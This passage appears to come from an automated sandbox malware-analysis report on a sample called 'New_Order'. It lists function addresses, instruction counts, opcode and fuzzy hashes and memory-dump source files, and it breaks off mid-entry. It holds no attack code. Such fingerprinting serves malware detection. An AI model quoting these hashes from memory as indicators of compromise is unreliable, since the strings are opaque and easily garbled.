                                                                                                • Instruction ID: 3801b563758f2c991026496fc35deb087af88936c4c8624a53012ccfb6c0e8fa
                                                                                                • Opcode Fuzzy Hash: 8f5889b95d7779138f350af43dc7a3553f32afc584fe40cb82d9c07db0172537
                                                                                                • Instruction Fuzzy Hash: D33196B1509362DFCB25EF6AC54182ABBF5FF89618F0449AEE4889B311D3319944CF92
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 012A438F Relevance: .1, Instructions: 89COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.1854001997.0000000001250000.00000040.00001000.00020000.00000000.sdmp, Offset: 01250000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_1250000_New_Order.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 8ebf9508d4c5ed62c3403e52871e3e442fc749eae5e5fdb1f7fab4342da477ba
                                                                                                • Instruction ID: 3a3d6b1cc25916f109e520cc545a5a9528c2b6544f08d73e9594518ac86bc7c1
                                                                                                • Opcode Fuzzy Hash: 8ebf9508d4c5ed62c3403e52871e3e442fc749eae5e5fdb1f7fab4342da477ba
                                                                                                • Instruction Fuzzy Hash: 5731F472B206869FD724EFB8C981A6EBBFAEF80304F548529D245D3254D7B0DD41CB90
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 0127CB7E Relevance: .1, Instructions: 89COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.1854001997.0000000001250000.00000040.00001000.00020000.00000000.sdmp, Offset: 01250000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_1250000_New_Order.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 8cd4161f5b4d08ac4698b36444b06603346f514182f58bb0feca1d395408faf4
                                                                                                • Instruction ID: 1dfa2acfeb60d4c18026a31ce8f3cdf3ba5b699063c0c68930bfd909ca3daec2
                                                                                                • Opcode Fuzzy Hash: 8cd4161f5b4d08ac4698b36444b06603346f514182f58bb0feca1d395408faf4
                                                                                                • Instruction Fuzzy Hash: E8212632E6125BABDB10DBB9C801BFFBBB6AF15740F058035AE15E7340E6B0D90087A0
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 0127C156 Relevance: .1, Instructions: 88COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.1854001997.0000000001250000.00000040.00001000.00020000.00000000.sdmp, Offset: 01250000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_1250000_New_Order.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 71a43415fd9aa1e0014b70a165c8bcef1207297c6d77fef79d069e15f47e277a
                                                                                                • Instruction ID: 15af032ceb942b626dd4a510f5227d35339895c1723014b14c124790359df972
                                                                                                • Opcode Fuzzy Hash: 71a43415fd9aa1e0014b70a165c8bcef1207297c6d77fef79d069e15f47e277a
                                                                                                • Instruction Fuzzy Hash: CD3189B15106068BEB35AF6CCC41B797BB4EF40314F4481A8EE899B3C2DA34D982CB90
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 0133C3CD Relevance: .1, Instructions: 88COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.1854001997.0000000001250000.00000040.00001000.00020000.00000000.sdmp, Offset: 01250000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_1250000_New_Order.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 7f3ac7f511b12b6545c220c591282cbbe50732f4b841637f95eeaa606406b8f4
                                                                                                • Instruction ID: bd72374b2fedb219fc20f58833749e868205ccc5cf7f0f4dd9c87a098285e828
                                                                                                • Opcode Fuzzy Hash: 7f3ac7f511b12b6545c220c591282cbbe50732f4b841637f95eeaa606406b8f4
                                                                                                • Instruction Fuzzy Hash: 16213D36600652B6CF16ABA99C40AFBBBB4EFC0714F40901FFAD5A7691E634D940C364
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 0127E420 Relevance: .1, Instructions: 88COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.1854001997.0000000001250000.00000040.00001000.00020000.00000000.sdmp, Offset: 01250000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_1250000_New_Order.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 0fc97a2d71bbb72b8f067b14809e593aa908de90ebcb0083e4a1af25c594133b
                                                                                                • Instruction ID: fa6e1b86fa5c388d3e1cb2b9dec204afa54e3193b91559d4b7e1490bedef1d04
                                                                                                • Opcode Fuzzy Hash: 0fc97a2d71bbb72b8f067b14809e593aa908de90ebcb0083e4a1af25c594133b
                                                                                                • Instruction Fuzzy Hash: 7931F631A2152D9BDB31DB18CC52FEF77B9EB14740F0201E5E745AB290D6B09E808FA0
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 012B4588 Relevance: .1, Instructions: 87COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.1854001997.0000000001250000.00000040.00001000.00020000.00000000.sdmp, Offset: 01250000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_1250000_New_Order.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 889ecffd1a06a090bd79871a4c0fdf01ee42b751b4f666e31dccfc06bb2b9632
                                                                                                • Instruction ID: 3c0009b3c71b6e32a79c7c5ccd196e68e1c8f8f932ce40888aff861460b4a851
                                                                                                • Opcode Fuzzy Hash: 889ecffd1a06a090bd79871a4c0fdf01ee42b751b4f666e31dccfc06bb2b9632
                                                                                                • Instruction Fuzzy Hash: F8219131A10649EFCB11DF58C9C0ADEBBB5FF48754F108069EF169B242D671EE058B90
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 012B44B0 Relevance: .1, Instructions: 87COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.1854001997.0000000001250000.00000040.00001000.00020000.00000000.sdmp, Offset: 01250000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_1250000_New_Order.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: b0af82b4b76034295eca9b373d0fa31510cbec817d2481d67bf5dbf66886b89c
                                                                                                • Instruction ID: f7c6ff0e61e11a33e7d7107d7a963ed293b46782f1d0d5ddfae45c081d8f1b9e
                                                                                                • Opcode Fuzzy Hash: b0af82b4b76034295eca9b373d0fa31510cbec817d2481d67bf5dbf66886b89c
                                                                                                • Instruction Fuzzy Hash: DA21B472524B869BCB21DF18D8C0FABB7E4FF98760F004519FA559B642D730E900CBA1
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 0127E388 Relevance: .1, Instructions: 86COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.1854001997.0000000001250000.00000040.00001000.00020000.00000000.sdmp, Offset: 01250000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_1250000_New_Order.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 0cf2ef89ce765565c41e30a718174bbd4c2b265194fcbe27392bd3351cdfdb09
                                                                                                • Instruction ID: 4cef2290cce2cc4e9a48cc7c951f69520df4a44ca9311b93ce7fe67c33ba858b
                                                                                                • Opcode Fuzzy Hash: 0cf2ef89ce765565c41e30a718174bbd4c2b265194fcbe27392bd3351cdfdb09
                                                                                                • Instruction Fuzzy Hash: DC31AD31610605EFD721CF68C894F6AB7F9FF85354F1145A9E6128B280E770EE01CB60
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 012FE609 Relevance: .1, Instructions: 86COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.1854001997.0000000001250000.00000040.00001000.00020000.00000000.sdmp, Offset: 01250000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_1250000_New_Order.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 998eae0d5ef0a57e2d2ab1fe536389153f031a0f4828dd39eb053c6a79dd01ba
                                                                                                • Instruction ID: 6bd227e5340707c2b3a2e44a347b39eb647e68de31cdba6df2ff7a8ab8a037b8
                                                                                                • Opcode Fuzzy Hash: 998eae0d5ef0a57e2d2ab1fe536389153f031a0f4828dd39eb053c6a79dd01ba
                                                                                                • Instruction Fuzzy Hash: 7A319C7562020ADFDB15DF1CC8949AEB7B6FF84304F16446DEA099B3A1E770EA40CB94
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 013006F1 Relevance: .1, Instructions: 79COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.1854001997.0000000001250000.00000040.00001000.00020000.00000000.sdmp, Offset: 01250000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_1250000_New_Order.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 5ea447b9b1b7f2dd6dcdb1a58c463b6b8976b792b449ccde5c3e4c043dd9525f
                                                                                                • Instruction ID: 8aa73139b2f4ea1f8f6166111cc60ef05a7d2640b866693427f6fa5f148fe5ab
                                                                                                • Opcode Fuzzy Hash: 5ea447b9b1b7f2dd6dcdb1a58c463b6b8976b792b449ccde5c3e4c043dd9525f
                                                                                                • Instruction Fuzzy Hash: 8A2191719105299BCF25DF59C891ABEB7F8FF48744F500069F541EB250D738AD41CBA1
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 0130019F Relevance: .1, Instructions: 78COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.1854001997.0000000001250000.00000040.00001000.00020000.00000000.sdmp, Offset: 01250000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_1250000_New_Order.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 25b7d267d994c95b34bcca7242dad057f97ec356e8a8da7b5c1fd4afda270405
                                                                                                • Instruction ID: 26e48d57f0d9618822580b61d06fb10f2910e73bb19a5160915d3eecba566520
                                                                                                • Opcode Fuzzy Hash: 25b7d267d994c95b34bcca7242dad057f97ec356e8a8da7b5c1fd4afda270405
                                                                                                • Instruction Fuzzy Hash: B8219C71610645AFDB1ADB6CC850F6AB7F8FF48784F144169F904D7690D634ED40CBA4
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 01300283 Relevance: .1, Instructions: 74COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.1854001997.0000000001250000.00000040.00001000.00020000.00000000.sdmp, Offset: 01250000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_1250000_New_Order.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 2b195fe39abda3aab301d25f561915d237230c444fc9a3b6ef389b2c10f113bb
                                                                                                • Instruction ID: adfd4cffcbcd70879625455af2a5fbfc118d6e713ef01bc2355764a7b96ea842
                                                                                                • Opcode Fuzzy Hash: 2b195fe39abda3aab301d25f561915d237230c444fc9a3b6ef389b2c10f113bb
                                                                                                • Instruction Fuzzy Hash: E621B3725043869BD717EFADC854B6BBBDCAF91288F084466BD80C7291D734DA04C7A1
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 012A2835 Relevance: .1, Instructions: 73COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.1854001997.0000000001250000.00000040.00001000.00020000.00000000.sdmp, Offset: 01250000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_1250000_New_Order.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: d9949ef043839acc83bf27e972e07296c693cf247f22710832264b28dcdf4315
                                                                                                • Instruction ID: 798d4a1bedd8024b4bde9d074f77dfb3fd8a3f899f76c73aa8df267b66c19f82
                                                                                                • Opcode Fuzzy Hash: d9949ef043839acc83bf27e972e07296c693cf247f22710832264b28dcdf4315
                                                                                                • Instruction Fuzzy Hash: 9A210B31635683DFF722976C8C18B247BD5BF41774F590360FB209B6D2D769C8018260
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 012BA30B Relevance: .1, Instructions: 70COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.1854001997.0000000001250000.00000040.00001000.00020000.00000000.sdmp, Offset: 01250000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_1250000_New_Order.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 2a335dfb49388c50c6de48d80b95751908c43130f0dc43448907b5a717894b71
                                                                                                • Instruction ID: 574a7c1cf4f268aafa21d18212240ada10dd3b3cefec45dfb5b7f3ac9632c9d0
                                                                                                • Opcode Fuzzy Hash: 2a335dfb49388c50c6de48d80b95751908c43130f0dc43448907b5a717894b71
                                                                                                • Instruction Fuzzy Hash: C5219A75221A41ABCB25DF29C841B56B7F5EF08744F14846CE609CB761E271E842CB94
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 0133A49A Relevance: .1, Instructions: 70COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.1854001997.0000000001250000.00000040.00001000.00020000.00000000.sdmp, Offset: 01250000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_1250000_New_Order.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 3cad593a1143b762856ea3bbff4cf6f8f36ea9d0378dec4b914dc728fe60d510
                                                                                                • Instruction ID: 7f799ba74a073c3fc2cbf3c27bb70b0996beea9a328b2e3885a262594fca0520
                                                                                                • Opcode Fuzzy Hash: 3cad593a1143b762856ea3bbff4cf6f8f36ea9d0378dec4b914dc728fe60d510
                                                                                                • Instruction Fuzzy Hash: FC11C672390B15FFE7225659AC41F277699DBD4B64F110028B798DB2D0EBB0DC018799
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 01300946 Relevance: .1, Instructions: 70COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.1854001997.0000000001250000.00000040.00001000.00020000.00000000.sdmp, Offset: 01250000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_1250000_New_Order.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: ce6e8de17f3b1234765654cf48e224c4d2034d4182b741e7e677987353450ed2
                                                                                                • Instruction ID: e5e9ef5de12d7c5963185233f05608aa66cbdda1bb9d8ae7c9ea45594c025a21
                                                                                                • Opcode Fuzzy Hash: ce6e8de17f3b1234765654cf48e224c4d2034d4182b741e7e677987353450ed2
                                                                                                • Instruction Fuzzy Hash: 6E2128B1E10209ABDB24DFAAD891AAEFBF8FF98714F10012FE505A7254D7709941CF50
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 013180A8 Relevance: .1, Instructions: 69COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.1854001997.0000000001250000.00000040.00001000.00020000.00000000.sdmp, Offset: 01250000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_1250000_New_Order.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 5cbf44edbda76f4502fdddb46b30f07fa62677dc347fe83d1d029fa4afc5ea58
                                                                                                • Instruction ID: a012a64c140f027e08a71459ccaa2ada152fc8a7695c4763f66343fccfe2c0eb
                                                                                                • Opcode Fuzzy Hash: 5cbf44edbda76f4502fdddb46b30f07fa62677dc347fe83d1d029fa4afc5ea58
                                                                                                • Instruction Fuzzy Hash: A9218C72A00209EFDF129F98CC40BAEBBB9EF88314F204469F944A7251D734DD50CB54
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 012B0124 Relevance: .1, Instructions: 68COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.1854001997.0000000001250000.00000040.00001000.00020000.00000000.sdmp, Offset: 01250000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_1250000_New_Order.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: bd8ac78140f895066083d1addf409b64165891323dc0076c6e3fdac533eabcce
                                                                                                • Instruction ID: e94bddbcfa5994f82c8a2206fea9caf9f00db8c757ae9ae8f4768e80c095dd81
                                                                                                • Opcode Fuzzy Hash: bd8ac78140f895066083d1addf409b64165891323dc0076c6e3fdac533eabcce
                                                                                                • Instruction Fuzzy Hash: AE11EF72620606AFEB269F48CC81FEBBBB8EB80794F100029F7009F180D671ED44DB64
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 01288770 Relevance: .1, Instructions: 68COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.1854001997.0000000001250000.00000040.00001000.00020000.00000000.sdmp, Offset: 01250000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_1250000_New_Order.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: d4ced6d55c46fcaebc263842b52b5fc6d7b051668199fcd5bdeb5a4090beae1d
                                                                                                • Instruction ID: ffec282440616b66c3d3e0ee0695afb5aa3010749f48a4a785cc5ff2e12f8efa
                                                                                                • Opcode Fuzzy Hash: d4ced6d55c46fcaebc263842b52b5fc6d7b051668199fcd5bdeb5a4090beae1d
                                                                                                • Instruction Fuzzy Hash: B21108767226129BEB15EF4DC4C0926BBF5EF46B10B94406DEE08CF340D6B1E901CB90
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 012BAAEE Relevance: .1, Instructions: 68COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.1854001997.0000000001250000.00000040.00001000.00020000.00000000.sdmp, Offset: 01250000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_1250000_New_Order.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 3b9caaf395a22a4929ed725bdef4f5484843110ef385696de3fd96b14fff4041
                                                                                                • Instruction ID: 6ce7d674dcc75bcece8d22af7fa5fb2438f150b548369725587aed305e897fc9
                                                                                                • Opcode Fuzzy Hash: 3b9caaf395a22a4929ed725bdef4f5484843110ef385696de3fd96b14fff4041
                                                                                                • Instruction Fuzzy Hash: 39218E71620642DFDB31CF4DC590AA6FBE6EBA4B90F14883EE65997611E770EC01CB40
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 012880E9 Relevance: .1, Instructions: 66COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.1854001997.0000000001250000.00000040.00001000.00020000.00000000.sdmp, Offset: 01250000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_1250000_New_Order.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: ece4fc94292f115e36ae59fdcf2c12ada64a0a0675dc31f4e0fbfb6bff86349d
                                                                                                • Instruction ID: c3d04b250b6692f2c0811f07fbc976c0bf0855d63d5d22909f17d6da799f7acb
                                                                                                • Opcode Fuzzy Hash: ece4fc94292f115e36ae59fdcf2c12ada64a0a0675dc31f4e0fbfb6bff86349d
                                                                                                • Instruction Fuzzy Hash: 9F219D71A11206DFCB14CF98C581AAEBBF5FB88318F64416DD205AB350CB71AE06CBD0
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 012B674D Relevance: .1, Instructions: 65COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.1854001997.0000000001250000.00000040.00001000.00020000.00000000.sdmp, Offset: 01250000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_1250000_New_Order.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: f15e0bee486a1d50c8c5aa65ca7e8614d7c655d683cedf8c95f6df09f54b1d70
                                                                                                • Instruction ID: 6b78b571899920a1d2b0d08b7254bddddf738354aa7ca4b2b64847298b616810
                                                                                                • Opcode Fuzzy Hash: f15e0bee486a1d50c8c5aa65ca7e8614d7c655d683cedf8c95f6df09f54b1d70
                                                                                                • Instruction Fuzzy Hash: E8218C75620A01EFD7248F69C881BA6B7E8FF44390F40882DE6AAC7250DA71B840DB60
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 01316870 Relevance: .1, Instructions: 63COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.1854001997.0000000001250000.00000040.00001000.00020000.00000000.sdmp, Offset: 01250000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_1250000_New_Order.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: b87a086087bae3fb5880e5dfba0bba6cc7ac31a535c06b3144c05406947ee1e8
                                                                                                • Instruction ID: 2941c7b2260ff0e9be687ff46f18552fcfa5c046a194653a5106e8e7633999bf
                                                                                                • Opcode Fuzzy Hash: b87a086087bae3fb5880e5dfba0bba6cc7ac31a535c06b3144c05406947ee1e8
                                                                                                • Instruction Fuzzy Hash: 0B1106B2240A04EFC726CB9DCD41F9A7BADEF59758F014029F605DB265DAB0EC01C790
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 012AE8C0 Relevance: .1, Instructions: 63COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.1854001997.0000000001250000.00000040.00001000.00020000.00000000.sdmp, Offset: 01250000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_1250000_New_Order.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 0994a018491f768e99cee3204a5246de6baa903b24df827b6e12f291c191748c
                                                                                                • Instruction ID: 2734591518ce14fdd7c3e430bf35c0309b9ed47179c6bc23cebd3b7784c13845
                                                                                                • Opcode Fuzzy Hash: 0994a018491f768e99cee3204a5246de6baa903b24df827b6e12f291c191748c
                                                                                                • Instruction Fuzzy Hash: 8C11AF733201119FCF19CB28CC96A7B7296DFD53B4B754438D523CB241E9308802C390
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 012B66B0 Relevance: .1, Instructions: 61COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.1854001997.0000000001250000.00000040.00001000.00020000.00000000.sdmp, Offset: 01250000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_1250000_New_Order.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 4bc6f2137055edb304a5e9747f8f8c4fc362e7f753d253ed15a131323ccb08f7
                                                                                                • Instruction ID: e30154134c0562cce248f44cf2b5457473ab0cd6e41abe520a2956bc3519c79e
                                                                                                • Opcode Fuzzy Hash: 4bc6f2137055edb304a5e9747f8f8c4fc362e7f753d253ed15a131323ccb08f7
                                                                                                • Instruction Fuzzy Hash: A911B276A21246DFCB29CF59C5C099ABBE8EB94790F054079DA059B311E670DD00DB90
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 0134A8E4 Relevance: .1, Instructions: 61COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.1854001997.0000000001250000.00000040.00001000.00020000.00000000.sdmp, Offset: 01250000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_1250000_New_Order.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 4aa21802b203594a0c183a0f29eab8f59a86752156d6c183eb3a1b7e63dba1b2
                                                                                                • Instruction ID: 577ac0584fa04318f3165108f654dd103ba69318e5afd6d3094a45d056fad5ff
                                                                                                • Opcode Fuzzy Hash: 4aa21802b203594a0c183a0f29eab8f59a86752156d6c183eb3a1b7e63dba1b2
                                                                                                • Instruction Fuzzy Hash: 9C110436A00909AFDB19CB58C801B9EFBF5FF84214F058269E84697340E631BD11CB90
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 01280AD0 Relevance: .1, Instructions: 61COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.1854001997.0000000001250000.00000040.00001000.00020000.00000000.sdmp, Offset: 01250000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_1250000_New_Order.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 975f93ae0bdd36ad56dc7d48bb40b3373a7fecd11d003270eb178f636a7ee754
                                                                                                • Instruction ID: 1ebc00f184c8b145e397ce060d303435c7045b38aa564cf534e4f08e4c9b3489
                                                                                                • Opcode Fuzzy Hash: 975f93ae0bdd36ad56dc7d48bb40b3373a7fecd11d003270eb178f636a7ee754
                                                                                                • Instruction Fuzzy Hash: 7F2106B5A01B059FD7A0CF29C441B52BBF4FB48B10F10492EE98AC7B40E371E854CB94
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 0130E7E1 Relevance: .1, Instructions: 59COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.1854001997.0000000001250000.00000040.00001000.00020000.00000000.sdmp, Offset: 01250000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_1250000_New_Order.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: be7cdff5b472ac4535dea4ef4a70d93a0a3acfb449cd7ab0a5074af29ebfca6c
                                                                                                • Instruction ID: 507abb30b12a23d259bd465e6cb12861f12a6940c60d5c8dfbb35f9b9c521421
                                                                                                • Opcode Fuzzy Hash: be7cdff5b472ac4535dea4ef4a70d93a0a3acfb449cd7ab0a5074af29ebfca6c
                                                                                                • Instruction Fuzzy Hash: 5811C232700605EFEB229F48C850B66BFE5EF45B58F058839EA599B1E0DB31DE40DB90
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 012A27ED Relevance: .1, Instructions: 58COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
